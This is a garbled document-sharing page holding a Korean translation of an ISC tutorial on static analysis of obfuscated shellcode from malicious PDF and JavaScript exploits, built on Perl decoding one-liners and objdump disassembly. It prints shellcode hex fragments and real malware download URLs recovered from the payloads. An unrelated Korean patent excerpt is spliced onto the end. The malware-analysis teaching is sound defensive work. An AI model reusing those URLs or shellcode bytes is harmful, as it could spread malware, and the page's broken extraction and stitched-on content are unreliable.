Microsoft Word - Static analysis of Shellcode.doc

Size: px

Start display at page:

Download "Microsoft Word - Static analysis of Shellcode.doc"

진희 단
5 years ago
Views:

1 Static analysis of Shellcode By By Maarten Van Horenbeeck 본문서에서는악성코드에서사용하는난독화되어있는쉘코드 를분석하는방법에대한 Maarten Van Horenbeeck 의글을번역 한것이다. Hacking Group OVERTIME OVERTIME force com>

$Maarten 의발표내용을다시한번살펴보자보통, 악성코드섹션을추출하거나또는 inflating 할때마지막작업으로아래와같이정렬된 shellcode 를포함하는자바스크립트익스플로잇함수를만나게된다. 이와같은블록을풀기위해서간단한펄스크립트를사용할수있다. cat nasty.js perl - pe 's/\ %u(..)(..)/ chr(hex($2)).$

2 Static analysis of Shellcode 두달전, ISC 핸들러인 Maarten Van Horenbeeck 는악성 PDF 파일에서 exploit 내용을추출하는방법에대한매우훌륭한내용을발표했다. 우리는이와같은악용을시도하는매우많은수의 PDF 또는 PDF- 파생품을보았다. 이문서에서는어떻게그들을해결하는지알아본다. Maarten 의발표내용을다시한번살펴보자보통, 악성코드섹션을추출하거나또는 inflating 할때마지막작업으로아래와같이정렬된 shellcode 를포함하는자바스크립트익스플로잇함수를만나게된다. 이와같은블록을풀기위해서간단한펄스크립트를사용할수있다. cat nasty.js perl - pe 's/\ %u(..)(..)/ chr(hex($2)).chr(hex($1))/ ge' hexdump - C more 이스크립트는 Unicode(%u ) 를실제출력가능한 ASCII 형태로변환한다. 대부분의 Unicode 블록은에셈블리어 (shellcode) 로되어있다. ASCII 로변환된내용은조금이상하게보인다. 이와같은이유로결과물을 hexdump 에넘겨준다. 하지만잠깐, 우리는 %u(hex) 를 ASCII 로변환했고그것을 Hexdump 에넘겼다. 이와같이하는이유는 %uxxyy 의바이트오더가변경된 (yy xx) 텍스트를얻기위해서이다. 그리고 hexdump C 또한 ASCII 를출력한다. ( 역자주 : 펄스크립트를보면 $2 가먼저나와서바이트오더를변경한다 ) b b5 cb ec e3 a4 64 b5 f3 ec µd.dµëì2.dã dµóì

00000330 32 64 eb 64 ec 2a b1 b2 2d e7 ef 07 1b 22 20 2b 2dëdì*±²-çï.." + 00000340 0d 0a 22 11 10 10 ba bd a3 a2 a0 a1 ef 68 74 74.."...º½ ïhtt 00000350 70 3a 2f 2f 61 6f 6c 63 6f 75 6e 74 65 72 2e 63 p://aolcounter.

3 eb 64 ec 2a b1 b2 2d e7 ef 07 1b b 2dëdì*±²-çï.." d 0a ba bd a3 a2 a0 a1 ef "...º½ ïhtt a 2f 2f 61 6f 6c 63 6f 75 6e e 63 p://aolcounter.c f 6d 2f a 6b 37 2f e om/4ezk7/exe.php b 0d 0a ");...var Y9Ib d b 0d uue = 0x400000;. 그리고주의깊게보면우리는다음단계로실제 exploit 이다운로드를시도하는 EXE 파일의이름을알수있다. ( 역자주 : / aolcounter.com/ 4eZk7/ exe.php 파일다운로드 ) 항상이처럼쉬운것만은아니다때때로다음단계의 URL 이인코딩되어있는경우도있다. 또다른 Shellcode 를살펴보자 이전과같은방식으로살펴보면 $ cat bad.js perl - pe 's/\ %u(..)(..)/ chr(hex($2)).chr(hex($1))/ ge' hexdump - C more c 6c 63 6f 64 var Shellcod

4 d 75 6e e=unescape(" c0 33 c9 eb 12 5e 66 b b fe 80 2e.3À3Éë.^f¹...þ e2 f7 eb 05 e8 e9 ff ff ff f4 b5..6.fâ ë.èéÿÿÿôµ b 0b 0b ac 3b 0b 0b 0b 96 4b 0f 96 7b 1f...bg ;...K..{ c0 3e e6 12 c1 1b 43 fd cc d6 10 0e e5 4b f6 >æ.á.cýw.ìö..åkö d0 fc ea e e f üf"xêa.a'.ài..v e0 61 1f 0e e e c8 b ce f3 5c 02 a..à...è adîó\ f ef f0 e6 ef 03 a e3...q.ïðæï....ã ed 7e b b a 7a 7a í~9%2{sww{e22zzz d e 68 6c 7d 6e rx}phg~hl}ns1t b 7e b 73 7b 42 qir2{~v2rxw1{s{b d e 6c 3d 3b 3b b 0b b 0a ; URL이보이지않는다. 누구나생각하는것처럼 URL은 Block안에있다. 대부분의 URL은일반적으로 / www 와같은형태로시작한다. 그래서만일우리가 abbcdeefff 와같이같은문자가반복되는형태의문자순서를본다면이것은대부분의경우인코딩된 URL 의시작패턴이다. 난독화를위해서사용되는가장기본적인방법은간단한 XOR 방식이다. 이와같은방식은이전문서에서다룬 XORSearch와같은툴을이용해서쉽게찾을수있다. ( 역자주 : Analyzing an obfuscated ANI exploit 문서참조 ) 이것은 XOR 형태가아니기때문에여기서는적용되지않는다. 그러면다음으로무엇을해야하는가? 두가지방법이있다. 하나는취약한시스템에서악

5 성코드를실행해서무엇을하는지알아내는것이고 ( 이와같은형태를 dynamic analysis 라고부른다 ), 또다른방법은유닉스 command line 이제공하는기능을이용해서단계별진행을통한 static analysis 를진행한다. 첫째로우리는쉘코드를유닉스디스어셈블러가이해할수있는형태로전환할필요가있다. 그렇게하기위해서우리는 형태로시작하는위의코드블락을 C 배열형태로변환해야한다. $ cat bad.bin perl - ne 's/ (.)/ printf "0x%02x,",ord($1)/ ge' > bad.c 변환하면아래와같다. 0x90,0x90,0x90,0x90,0x90,0x33,0xc0,0x33,0xc9,0xeb,0x12,0x5e,0x66... 아래와같은형태로전환한다. int main() { char foo[] = { 0x90,0x90,0x90,0x90,0x90,0x33,0xc0,0x33,0xc9,0xeb,0x12,0 x5e,0x66... }; } 컴파일한다. $ gcc - O0 - fno- inline bad.c - o bad.bin 디스어셈블가능한형태로변환한다 $ objdump - - disassembler- options=intel - D bad.bin 이작업의결과는 intel 어셈블리코드이다. 만일당신이악성코드리버스엔지니어링경험이있다면정확히 OllyDbg 사용경험이있다면해당코드를보는데어려움이없을것이다. 하지만그렇지않다면내용을이해하는것이힘들것이다. 어셈블리파일을살펴보다보면아래형태의코드블록을찾을수있을것이다. 4005a0: 90 nop 4005a1: 90 nop 4005a2: 90 nop 4005a3: 90 nop

6 4005a4: 90 nop 4005a5: 33 c0 xor eax,eax 4005a7: 33 c9 xor ecx,ecx 4005a9: eb 12 jmp 4005bd <C x1d> 4005ab: 5e pop rsi 4005ac: 66 b mov cx,0x b0: 8b fe mov edi,esi 4005b2: 80 2e 07 sub BYTE PTR [rsi],0x7 4005b5: xor BYTE PTR [rsi],0x4 4005b8: 46 e2 f7 rexxy loop 4005b2 <C x12> 이것은우리가쉘코드로부터얻은바이트순서이다. 내용을살펴보면블록의루프는 4 와 XOR 하기전에모든바이트에서 7 을뺀다. 확인해보자 cat bad.bin perl - pe 's/(.)/ chr((ord($1)- 7)^4)/ ge' hexdump - C c2 8d c2 8d c2 8d c2 8d c2 8d 28 c2 bd 28 c3 86 Â.Â.Â.Â.Â.(Â½(Ã c3 a0 0f 53 5b c2 b6 ff 80 8f bf bf bf bf bf bf Ã.S[Â ÿ bf bf bf bd ff 80 8f bf bf bf bf bf bf bf bf bf ½ÿ b0 bf bf bf bf bf bf bf bf bf c2 8e 4e 0e c3 ac c3 Â.N.Ã Ã c0 ad c3 9b c3 ac ff 80 8f bf bf bf bf bf bf bf bf - Ã.Ã ÿ d0 bf b8 c2 98 ff 80 8f bf bf bf bf bf bf bf bf bf Â.ÿ e0 be c2 8a 0e 7e c3 98 c3 a a 2f ¾Â..~Ã.Ã s6./pht f a 2f 2f e 79 6f d tp:// e 69 6e 66 6f 2f b 2f search.info/psk/ f e f 62 3d 6d

7 out.php?b=mfsa d a 0a 결과물에서우리는다음단계에서사용되는 URL 을얻을수있다. 이와같은방식으로 URL 을찾기전에알아두어야할내용은모든쉘코드가 URL 을포함하고있는것은아니다. 그렇지만만일쉘코드에 URL 이포함되어있다면이와같은방식이많은도움이될것이다.

특허청구의 범위 청구항 1 앵커(20)를 이용한 옹벽 시공에 사용되는 옹벽패널에 있어서, 단위패널형태의 판 형태로 구성되며, 내부 중앙부가 후방 하부를 향해 기울어지도록 돌출 형성되어, 전면이 오 목하게 들어가고 후면이 돌출된 결속부(11)를 형성하되, 이 결속부(11

특허청구의 범위 청구항 1 앵커(20)를 이용한 옹벽 시공에 사용되는 옹벽패널에 있어서, 단위패널형태의 판 형태로 구성되며, 내부 중앙부가 후방 하부를 향해 기울어지도록 돌출 형성되어, 전면이 오 목하게 들어가고 후면이 돌출된 결속부(11)를 형성하되, 이 결속부(11 (51) Int. Cl. (19) 대한민국특허청(KR) (12) 등록특허공보(B1) E02D 29/02 (2006.01) E02D 17/20 (2006.01) E02B 3/14 (2006.01) (21) 출원번호 10-2010-0089517 (22) 출원일자 2010년09월13일 심사청구일자 (56) 선행기술조사문헌 JP2006037700 A* KR100920461